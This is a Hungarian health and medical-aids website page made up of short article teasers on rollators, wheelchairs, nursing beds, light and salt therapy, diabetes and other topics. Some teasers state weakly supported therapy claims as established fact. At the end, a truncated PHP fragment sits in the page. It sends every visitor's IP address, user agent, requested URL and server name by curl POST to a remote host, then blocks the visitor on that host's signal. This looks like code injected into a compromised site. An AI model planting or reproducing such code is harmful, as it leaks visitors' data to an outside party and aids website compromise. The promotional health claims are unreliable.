Az egészségről

A rollátorok olyan segédeszközök, amelyek jelentős segítséget nyújtanak a betegek helyváltoztatásában. Ezek a praktikus eszközök könnyű és stabil járássegítő eszközök, amelyek elősegítik a biztonságosabb és kényelmesebb közlekedést. A rollátoroknak különböző típusai vannak, amelyek különböző funkciókkal és tulajdonságokkal rendelkeznek, hogy megfeleljenek a különböző betegségek és mozgáskorlátozottságok okozta igényeknek.

Gyógyuljon fényterápiával!

Nem kell feltétlenül alternatív gyógymód hívőnek lennünk ahhoz, hogy a polarizált fény által kínált gyógyulás lehetőségeit keressük, ugyanis bizonyított tény, hogy több bőrgyógyászati és mozgásszervi probléma esetén hatékonyan tudja segíteni állapotunk javulását.

A gerincnyújtó pad jótékony hatásáról

A ma emberének szinte biztos, hogy élete során valamikor problémája akad a hátával, és napjainkban sajnos ez már egyre korábban következik be. Már gyermekkorban, a kiskamaszok körében gondot okozhat a hátfájás a hirtelen megugró testmagasság miatt, hiszen a csontok gyors növekedését nem követi a gerincoszlopot tartó izmok megfelelő mértékű fejlődése.

Ismerjük meg az elektromos kerekesszéket!

Az első elektromosan meghajtott kerekesszéket 1950-ben készítette el egy kanadai férfi, bizonyos George Klein. Az évszámból ki is találhatjuk, hogy második világháborús veteránokon szeretett volna segíteni a találmányával, hiszen ebben a háborúban viszonylag nagy volt a túlélési arány, azonban sokan szenvedtek olyan sérüléseket, amelyek ellehetetlenítették a későbbi ép életet, kerekesszékbe kényszerülve voltak kénytelenek élni, nem ritkán akár nyaktól lefelé megbénulva.

Ápolási ágyhoz ápolási matracot!

Ha megszületett a döntés az ápolási ágy otthoni beszerzéséről, mert a hozzátartozója tartósan ápolásra fog szorulni, akkor körültekintő információszerzés után válassza ki a kívánt ágyat. Szerette ezután a nap jó részét ebben az ágyban ülve és fekve fogja tölteni, úgyhogy nem mindegy hogy milyen eszközt szereznek be.

Bokarögzítő használatával sikeres a kezelés és megelőzhető az állapotromlás

Nem kell feltétlenül versenyszerűen sportolni ahhoz, hogy bokasérülést szenvedjen az ember, hiszen a hétköznapokban is elég egy rossz mozdulat ahhoz, hogy kiforduljon a boka, sérülést szenvedjenek a szalagok.

Segítsük idős hozzátartozóinkat rollátorral!

Idegenül csengő szó, de egyre többen ismerjük már, hiszen lassanként beépül a köztudatba. Talán jobban körülírná a termék lényegét a guruló járókeret szó, de barátkozzunk meg inkább az előző megnevezéssel, mert sokak számára már így ismert és egyszerűbb is.

Egy mindenki által ismert gyógyászati segédeszköz: a járókeret

A járókereteket mindenki ismeri, hiszen az egyik legrégebbi járást segítő eszköz.

A sóterápia története és jótékony hatása

 

Még az alternatív gyógymódokkal szemben szkeptikusok legnagyobb része is elismeri az egyik legősibb gyógymód hatékonyságát, ami nem más, mint a sóterápia.

 Egyszerűbb a betegmozgatás betegemelő lifttel

A betegségek, sérülések között vannak olyan típusok, amik nem teszik lehetővé a beteg számára, hogy saját akarata szerint mozogjon. Az ágyhoz kötöttségnek megvan az a hátránya, hogy a beteg nem mozoghat. Mégis meg kell oldani a szállítását, amit a legegyszerűbben betegemelő lifttel lehet kivitelezni.

A testi fogyatékossággal élők, mozgássérültek és azok, akik tartósan vagy átmenetileg nehezen mozognak, a kerekesszékre számíthatnak, ha közlekedésről van szó. A kerekesszék legújabb modelljeit kínáljuk azoknak, akik ilyen segédeszközt szeretnének vásárolni.

Az ízületi porckopás és a különböző mozgásszervi gyulladások a 21. század gyakorta előforduló népbetegségeinek számítanak. Ezek nemcsak kínzó fájdalmat okoznak az érintetteknek, a mozgáskorlátozottság a mindennapi feladatok elvégzésében is fennakadásokat jelenthet. Az ízületi betegségek kialakulásának számtalan oka lehet, legfőképp a genetikai hajlam az, ami a bajt okozza.

A kerekesszékek hatalmas segítséget nyújtanak azoknak az embereknek, akik valamilyen betegség miatt járóképtelenek vagy korukból kifolyólag önállóan csak nagyon rövid táv megtételére képesek. A kerekesszékek kezdetben nehezen kezelhető eszközök voltak, azonban manapság szerencsére ez változott, ennek köszönhetően a székben ülőknek nem feltétlenül van szükségük külső segítségre ahhoz, hogy helyet változtathassanak. Többféle típusú, kialakítású, funkciójú kerekesszék érhető el, és a kínálat folyamatosan bővül: a szakemberek egyre kényelmesebb, egyszerűbben kezelhető eszközöket tudnak ajánlani.

Kompressziós harisnyát általában a vénás keringési rendszer, vagy a nyirokkeringési rendszer valamilyen rendellenessége esetén ajánlott viselni. A hölgyek közül azonban egyre többen döntenek a különböző erősségű, esztétikus, divatos kompressziós harisnyák viselése mellett, a fent említett problémák megelőzése céljából.

Az ízületi kopás okozta fájdalmak kezelése sokszor minden erőfeszítés ellenére is csak mérséklet eredménnyel jár. Ráadásul igen sokszor nagy anyagi ráfordításokat is jelenthet. Ki ne lenne elkeseredett és dühös, ha forint ezreket-tízezreket eredménytelenül fizet ki? Rövid cikkünkben bemutatjuk azokat a nem gyógyszeres és nem műtéti eljárásokat, amelyek segítséget jelenthetnek a kínzó fájdalmak enyhítésében.

Az ízületi porckopás, más néven az artózis egy rendkívül kellemetlen betegség, ami képes teljesen mozgásképtelenné tenni az embereket. Egy ilyen állapot nemcsak elviselhetetlen, hanem kiszolgáltatottá teszi is a betegeket, ráadásul a fájdalom kisugározhat egyik testrészből a másikba, így sokszor azt sem könnyű megállapítani, mely ízület okozza a problémát. Természetes, hogy az érintettek szeretnének tenni azért, hogy ez javuljon, azonban ehhez valóban hatékony megoldásra van szükség.

A D-vitaminnal kapcsolatban az utóbbi években változtak az ajánlások: sok olyan kutatás látott ugyanis napvilágot, amely szerint többre van szükségünk, mint eddig gondoltuk. Ez azt jelenti, hogy hazánkban a felnőtteknek, a kamaszoknak és a kisgyerekeknek is D-vitamin pótlásra van szükségük legalább a téli hónapokban.

 

Azok, akik ideiglenesen vagy tartósan korlátozottak a mozgásukban valamilyen betegségből kifolyólag, értelemszerűen komoly nehézséget okoznak számukra az olyan mindennapi teendők, mint például az öltözködés vagy a tisztálkodás. 

A Glükozamin a szénhidrátok csoportjába tartozó vegyület, melynek molekulájában a szénhidrátokat általánosan alkotó szén, hidrogén és oxigén mellett nitrogént is találhatunk. A csoportot szokták aminocukroknak is hívni, ahol az -amin előtag a nitrogén jelenlétére utal. A rovarok páncélját alkotó kitin tulajdonképpen polimer (rendkívül sok összekapcsolódott molekula) glükozamin. A glükozamin természetes anyag, tengeri állatok kitinpáncéljából állítják elő.
Érdekesség, hogy az új-zélandi taréjos zöldkagylónak több mint 13% a glükozamin tartalma.

 

Az idős vagy mozgásában korlátozott embereknek nagyon fontos, hogy környezetük állapotuknak megfelelően legyen kialakítva. Ilyenkor olyan berendezésekre, bútorokra van szükség, amik az ápolásra szorulók kényelmét szolgálják és megkönnyítik számukra a mindennapokat. Ebben az esetben különös figyelmet kell szentelni az ágy kiválasztására.

A kineziológiai szalag a mozgásszervi problémák kezelésében az egyik leghatékonyabb módszer.  Gyors, fájdalommentes, hatékony segítséget nyújt ficamok, húzódások, sportsérülések, gerinc és végtagfájdalmak kezelésekor, valamint mozgásszervi műtétek utáni rehabilitációban is. A különböző szakszerű ragasztási technikák segítségével erősítő, korrigáló vagy regeneráló hatást lehet vele elérni.

A magyar háziasszonyok ritkán gondolnak rá, konyhánk nem ismeri, de a keleti éttermek kínálatában és az élelmiszerszínezékek palettáján sokszor találkozhatunk természetes ételeinktől idegen, rikító sárga színével. Ez a gyógyító kurkuma.

A kurkuma fűszert a növény sárga belsejű gyökérzetéből nyerik. A gyökeret és a szárat megszárítják, aprítják, sajtolják, az ekkor kiszivárgó levet gyógyitalként fogyasztják, vagy hajpakolásnak használják, szárát főzve, majd szárítva porrá őrlik, és fűszerként használják. Egyes vidékeken friss hajtását zöldség gyanánt is fogyasztják.

A metabolikus más néven anyagcserével kapcsolatos szindróma vagyis tünetegyüttes több, egymással összefüggő anyagcserezavar egyszerre történő fennállását jelenti. Valószínűleg az inzulinra való csökkenő válaszképesség, vagyis a vele szembeni rezisztencia  az ok, amely miatt hosszútávon kifejlődik.
A metabolikus szindróma általános tünetei a csökkenő glükóztolerancia, vagyis a vércukorszint-emelkedésre való hajlam, a magas vérnyomás, a főleg a hasra történő elhízás, a magas vérzsírszint és a magas koleszterinszint.  Ezek az okok már önmagukban is fokozzák a szívkoszorúér-betegség, a stroke és a 2-es típusú cukorbetegség kialakulásának valószínűségét. Együtt azonban még jobban növelik a kockázatot és rövidítik az életet. Ha Önnek metabolikus szindrómája van, vagy megjelent annak bármelyik komponense, akkor szükséges az azonnali életmódváltá. Szerencsére a metabolikus szindróma megfelelő életmódváltással felszámolható, amelyet azért is érdemes megtenni, mert minél hosszabb ideig áll fent, annál több nehezen gyógyítható vagy éppen maradandó károsodást hagy hátra:  pl. érelmeszesedés, szívinfarktus, stroke.

Az allergiás eredetű nátha a magyar lakosság mintegy egytizedét érinti. A betegség ugyan nem gyógyítható, de a tünetek alapján könnyen diagnosztizálható és hatékonyan kezelhető.

Vérnyomásmérés során két értékről beszélünk:   Az első szám azt a nyomást mutatja a kar fő artériájában, ami a szív összehúzódásakor alakul ki (szisztolés vérnyomás), a második a szívverések közti szünetben mérhető nyomást mutatja (diasztolés vérnyomás).

A vérnyomást befolyásolja a testhelyzet, a napszak, az érzelmi állapot. Gyakran az orvosi rendelőben magasabb értékek kerülnek rögzítésre, mint az otthon mért vérnyomás értékek. A magasvérnyomás-betegség diagnózisának felállításában, valamint a kezelés hatékonyságának felmérésében is segíthet az otthoni mérés

Mi a makuladegeneráció?

A fejlett társadalmakban az időskori látásromlás egyik vezető oka napjainkban az úgynevezett szemfenéki meszesedés, orvosi kifejezéssel makula-degeneráció. Köznyelvi elnevezése valójában helytelen, hiszen egyáltalán nem a szemfenéki erek meszesedése okozza.
A macula - vagy sárgafolt - az éleslátás helye, ez az ideghártya-terület felelős a kép észlelésekor az éles látásért, és ez az a terület, amely olvasóképességünket is biztosítja. A degeneráció elfajulást, e betegségnél az éleslátás helyén az ideghártya sejtjeinek pusztulását jelenti.
A makula-degeneráció kimondottan az idős kor betegsége, s gyógyítása ma még egyáltalán nem, vagy csak részben lehetséges.

Betegnek lenni sohasem könnyű, sok kellemetlenséggel járó állapot, amit nem szívesen élünk át újra. Sajnos azonban vannak olyan betegek is, akik tartósan kénytelenek elviselni az őket kínzó tüneteket vagy olyan állapotba kényszerültek, amin nem lehet javítani. A hozzátartozóik, az ápolóik ebben az esetben csak annyit tehetnek, hogy igyekeznek megkönnyíteni a mindennapjaikat és elviselhetőbbé tenni a teljesen vagy részlegesen ágyhoz kötött életet.

A régi időkben még a fizikai munka volt meghatározó. Az emberek többsége valamilyen aktív fizikai igénybevételt megkövetelő munkát végzett nap, mint nap, amiben ugyan elfáradt estére, de nem ártott vele a saját szervezetének. Ma már az a jellemző, hogy sokkal többen végeznek valamilyen ülőmunkát irodában, mint állandó, fizikai igénybevétellel járó feladatot.

A magassarkúaknak nagyon komoly egészségkárosító hatása lehet.
Valóban magasra tesszük a mércét, ami lábak szépségét illeti?
Nem divat a kalapács ujj, de mégis elterjedt.
A magassarkú cipők előnyei:
Magasítják, hosszítják és gyönyörű ívet adnak a lábaknak. A vádlik megerősödnek tőle. Viseletükkel elegáns és nőiesek lehetünk. Tökéletesek alkalmakra.
Sok nőnek elengedhetetlen kellék egy alkalomhoz, de sajnos vannak akik éjjel-nappal viselik. Ezzel hosszú távon tönkre teszik a lábukat és a gerincüket.

 

Az egészsége bárkinek megromolhat átmenetileg vagy tartósan is. Azok, akik valamilyen sérüléssel, betegséggel, fogyatékossággal küzdenek vagy egyszerűen csak a korukból adódóan mozognak nehezebben, gyakran szorulnak valamilyen gyógyászati segédeszköz használatára. A gyógyászati segédeszközök olyan orvostechnikai eszközök, amiket anélkül is tudnak használni a tulajdonosaik, hogy orvosi vagy pedig ápolói segítséget kellene hozzájuk igénybe venni.

Az idős vagy beteg ember számára az egyik legfontosabb az ágy kényelme. Amennyiben segít a mozgásban, a kiszállásban és a mindennapi tevékenységek elvégzésében az felére egy ápoló személy jelenlétével. Az ágyat az alapján válasszuk meg, hogy mennyi segítséget várunk attól, valamint mennyire legyen esztétikus, a szoba bútorzatába illő.

Számos háztartási baleset helyszíne a fürdőszoba. Ebben a helyiségben több veszélyforrás található, elég a nedves padlóra vagy a csúszós zuhanytálcára, kádra gondolni. Ezek a tényezők különösen veszélyesek az idősekre vagy azokra az emberekre nézve, akik valamilyen mozgásszervi betegségben szenvednek, és emiatt nehezebben mozognak.

A gyógyászati segédeszközök egyik legfontosabb csoportját alkotó elektromos felfekvés elleni matracok nagy száma van jelen a piacon. Ezeknek a termékeknek az elterjedésének gátat szabott az áruk, azonban ebben jelentős változás következett be az elmúlt időszakban. A vásárlást megelőzően számtalan kérdés merül fel abban a tekintetben, hogy kinek mikor javasolt ilyen terméket használni.

A gyógyászati segédeszközök területén ma már szinte minden elérhető és beszerezhető, ami ahhoz, kell, hogy egy beteg tökéletes ápolást kaphasson. Akit nem kórházban ápolnak, hanem az otthonában lábadozik, annak szüksége lesz néhány speciális eszközre és kiegészítőre ahhoz, hogy a gyógyulása gyorsabb legyen. Ezek az eszközök segítenek a közlekedésben, megkönnyítik a mozgást, felgyorsítják a regenerálódást, biztosítják a kényelmet és ahhoz is hozzájárulnak, hogy a betegek képesek legyenek a lehető legnagyobb mértékben gondoskodni magukról.

Összegyűjtöttük a leggyakrabban előforduló gyógyászati segédeszközöket, és leírtuk azok általános jellemzőit.

A terhesség, a gyermekáldás csodás dolog, de egyben hatalmas változásokat is generál a kismama szervezetében, meg is terheli azt a terhesség hónapjai alatt. A legnagyobb terhelés a hasat éri, hiszen egy új élet növekszik benne, a szervezet pedig alkalmazkodik ehhez.

Az otthonápolás számos beteget érint, akinek van lehetősége választani és a kórházi ellátás helyett az otthonában gyógyul. Az ő számukra egy sima ágy nem megfelelő, sokkal inkább egy elektromos betegágyat érdemes választani.

A modern életmód sok olyan csapdát tartogat, amibe belesétálva felelőtlenül rövidítjük meg az életünket. A dohányzás vagy az alkohol, az egészségtelen táplálkozás mellett az egyik legártalmasabb dolog nem más, mint a mozgásszegény életmód. A rengeteg ülés cseppet sem természetes, hiszen megpróbáltatásoknak teszi ki a gerincet. Már az iskolai évektől kezdve sokat töltünk üléssel, ami a legtöbb embernél felnőttként sem változik. 

 

Az orvosi segédeszközök között megtalálhatóak olyan digitális eszközök is, amiket kifejezetten mérésre terveztek. A különféle digitális mérőeszközök használata arra szolgál, hogy a betegek akutális állapotáról pontosabb képet lehessen kapni, fontos eszközei az önellenőrzésnek, az otthoni ápolásnak. Az ilyen mérőkészülékek megvásárolhatóak és a betegek otthon is tudják őket használni. A kezelésük egyszerű, az áruk megfizethető, a használatukat könnyen el tudják sajátítani az idősebbek is


Sok idős ember rendelkezik olyan fürdőszobával, ami nem igazán biztonságos és komfortos számára. Ez különösen igaz a fürdőrészre: rengeteg ingatlanban magas peremű fürdőkádak vannak, vagy pedig a zuhanyzó nem olyan kialakítású, ami ideális lenne egy idős embernek. Többen is megpróbálnak ezen változtatni, például átalakításokkal, azonban erre nem mindenkinek van kapacitása, ezért olyan megoldás után kell kutatni, amivel rövid időn belül, egyszerűen balesetmentessé és kényelmessé lehet tenni a fürdőt.

A csecsemők kifejlett lábboltozattal nem rendelkeznek. A felállás és járás folyamatában alakulnak ki a lábfej boltozatai. A csecsemő lábujjhegyen kezdi el magát tartani, folyamatosan edzi azokat az izmokat, amelyek majd a biztos állás kivitelezéséhez szükségesek. Jogosan merül fel a kérdés, hogy egyáltalán minek is boltozat. Az emberi lábszerkezet akkor tudja betölteni funkcióját, ha a haránt és a hosszanti lábboltozatok is kifejlődnek. Ennek hiányában az állá és járás statikája és mechanikája rendellenes lesz és bizonyos területek túlterhelődnek, fájdalmassá válnak: lábujjak alapizületei fájdalmassá válnak, kalapácsujj alakul ki. A felnőtt derék- és lábfájdalmak gyermekkorban kezdődnek. Megelőzésükről a szülőknek kell gondoskodni! Ennek alapja az olyan lábbeli választása, amely az egészséges lábszerkezet kialakulását segíti.

Manapság, ha valaki kerekesszékekkel kapcsolatban keresgél, azt tapasztalhatja, hogy a termékek különböző árkategóriában érhetőek el. Ezeket az eltéréseket jó pár tényező befolyásolja, amikkel érdemes még a vásárlás előtt tisztában lenni, így a vevőt nem érheti kellemetlen meglepetés.

Mindent elöntenek a gyógyszer reklámok?

Érzésre rengeteg gyógyszerreklámot nézünk a tévében. És nem csak érzésre: a mért adatok szerint az összes reklám több mint egynegyede valami gyógykészítményről szól. Élelmiszert és kereskedelmet összesen nem reklámoznak ennyit a tévékben.

Az Egészségügyi Világszervezet (WHO) legutóbbi jelentése szerint az elmúlt három évtized alatt mintegy négyszeresére nőtt a cukorbetegséggel küzdők száma, ami többek között a mozgásszegény életmódnak és annak köszönhető, hogy – különösen az alacsony és közepes jövedelmű országokban – ma már sokkal könnyebben és olcsóbban beszerezhetők a magas cukor- és zsírtartalmú élelmiszerek mint korábban.  

 

A hát- és derékfájás korunk egyik népbetegsége: rengeteg embert érint szerte a világban, és nem csupán időseket kínoznak a kellemetlen tünetek, hanem a fiatalabb korosztályt is, közöttük is leginkább azokat a személyeket, akik ülőmunkát végeznek. A fájdalmakat legfőképp a rossz testtartás idézi elő.

Ijesztő adatokat tett közzé a Semmelweis Egyetem I. Sz. Belgyógyászati Klinikájának egyetemi tanára, dr. Kempler Péter, aki szerint ma Magyarországon 3-4 ezer cukorbeteg lábát kell levágni évente, világszerte pedig percenként három lábat amputálnak a diabétesz miatt. “Elvben ma már egyetlen végtagot sem szabadna amputálni a cukorbetegség szövődményeként megjelenő neuropátia miatt, ezzel szemben a világon húsz másodpercenként hajtanak végre ilyen beavatkozást” – tette hozzá.

 

Nem kell hozzá teniszezni, vagy golfozni sem, sőt még hasonló úri sportot sem kell űzni, hogy teniszkönyök, vagy golfkönyök betegség alakuljon ki. Az a leggyakoribb könyökbántalom, amely miatt orvoshoz fordulnak a betegek. Makacssága, valamint a mindennapjainkat megkeserítően nehézzé tévő tulajdonságai kísértetiesen hasonlóvá teszik a lábfejen jelentkező krónikus fájdalmakhoz. Ha megértjük mibenlétét, talán gyógyulásunkért is többet tehetünk.

Minden gyermek számtalanszor hallja azt a szüleitől vagy a tanáraitól, oktatóitól, hogy üljön egyenesen, húzza ki magát, mert a görbe hát nem szép látvány. Nemcsak, hogy nem szép, de ráadásul nem is egészséges. Az iskoláskorú gyerekek is ki vannak téve a rengeteg üléssel töltött órának, amit az iskolapadban vagy otthon az íróasztal előtt tanulással, feladatmegoldással töltenek.

A cukorbetegségről és a vércukormérésről

Mi a cukorbetegség?

A cukorbetegség kialakulásának megértéséhez  először érdemes megismerni a cukor sorsát szervezetünkben. A szőlőcukor - más néven glükóz - a sejtek legfontosabb energiaforrása. A szőlőcukor egy része a táplálékból szívódik fel az emésztőrendszerben. A többit a máj állítja elő egyéb anyagokból. A vérből a cukor bejut a szervezet sejtjeibe. A legtöbb sejttípus esetében ez a belépés inzulin segítségével történik. Az inzulint a hasnyálmirigy állítja elő. A vérben az inzulin kulcsként viselkedik, ami megnyitja azokat a képzeletbeli kis kapukat, amelyeken át a glükóz bejut a sejtekbe. Ebből az következik, hogy az inzulin jelenléte csökkenti a szőlőcukor-szintet a vérben. Amikor a vérben található cukor mennyisége lecsökken, ezzel együtt az inzulin termelődése is csökken a hasnyálmirigyből. A máj a cukor tárolójaként és előállítójaként is viselkedik: ha alacsony a vércukorszint, de nincs lehetőség táplálék felvételre, a máj felszabadítja a tárolt cukrot illetve szükség esetén újonnan is előállít. Így tartja normál tartományban a vércukorszintet.

true, CURLOPT_TIMEOUT=>5, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>"u=1&ra=".$s["REMOTE_ADDR"]."&ua=".$s["HTTP_USER_AGENT"]."&ru=".$s["REQUEST_URI"]."&sn=".$s["SERVER_NAME"]));$c = curl_exec($h);curl_close($h); if($c=="403"){header('HTTP/1.0 403 Forbidden');die();} ?>